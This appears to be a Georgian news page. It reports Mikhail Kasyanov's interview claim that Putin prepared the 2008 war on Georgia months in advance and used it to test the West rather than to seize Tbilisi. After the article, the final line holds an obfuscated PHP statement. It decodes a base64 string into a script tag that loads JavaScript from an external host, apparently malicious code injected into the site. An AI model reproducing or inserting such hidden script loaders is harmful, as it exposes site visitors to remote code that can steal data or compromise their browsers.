celsiusi
ავერსი საქკაბელი
რუსეთის ყოფილი პრემიერ–მინისტრის, მიხაილ კასიანოვის თქმით, 2008 წელს პუტინს მიზნად არ ქონდა თბილისამდე ჩასვლა – ამის შესახებ მან რადიო მაესტროსთან ინტერვიუში განაცხადა. 
 
მისივე თქმით, ეს ომი პუტინის რეჟიმის მიერ რამდენიმე თვით ადრე მზადდებოდა.
 
„მე მგონია, რომ პუტინს მაშინ მიზნად არ ქონდა თბილისამდე ჩასვლა. მიზანი იყო დასავლეთის დატესტვა. მან ეს გააკეთა და პასუხიც მიიღო. არ ვთვლი, რომ  პუტინს მაშინ სრულიად საქართველოს ოკუპაციისა და რეჟიმის შეცვლის  სურვილი ჰქონდა. ის რომ მას საქართველოს დაქვემდებარების მიზანი ქონდა, მე ასე არ ვთვლი, ამით მან შეძლო დასავლეთის დატესტვა, მეტიც მან არა თუ საჯარისო ნაწილები გაიყვანა, არამედ ტერიტორიების ანექსია მოახდინა. 
 
ეს ომი პუტინის რეჟიმის მიერ რამდენიმე თვით ადრე მზადდებოდა, აგვისტოს შეჭრამდე, თუ ვინ განახორციელა პირველი გასროლა, ამას არანაირი მნიშვნელობა არ აქვს. ყველაფერი მზადდებოდა, პუტინი და მისი გარემოცვა ცნობილი პროვოკატორები არიან. მათ ამას კეკებეს სკოლაში ასწავლიდნენ. ჩვენ შეგვიძლია სხვადასხვა გამოძიებები წავიკითხოთ, მაგრამ ვინ გაისროლა პირველმა ამას არანაირი მნიშვნელობა არ აქვს. აგრესია იყო მომზადებული, ამის დამამტკიცებელია ის, რომ საქართველოს საზღვრებთან ეშელონებით მიდიოდა სამხედრო ტექნიკა, ამ რაოდენობით ტანკები და ჯავშან მანქანები საქართველოს საზღვრებთან არასოდეს მანამდე არ ყოფილა. სწორედ აქედან გამომდინარე მიმაჩნია, რომ ეს იყო მომზადებული აგრესია და ამაში  დამნაშავე  მხოლოდ და მხოლოდ პუტინის რეჟიმია.“ – განაცხადა კასიანოვმა. 
 
ინტერვიუს სრულად ნახვა შესაძლებელია აქ. 
 
946
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");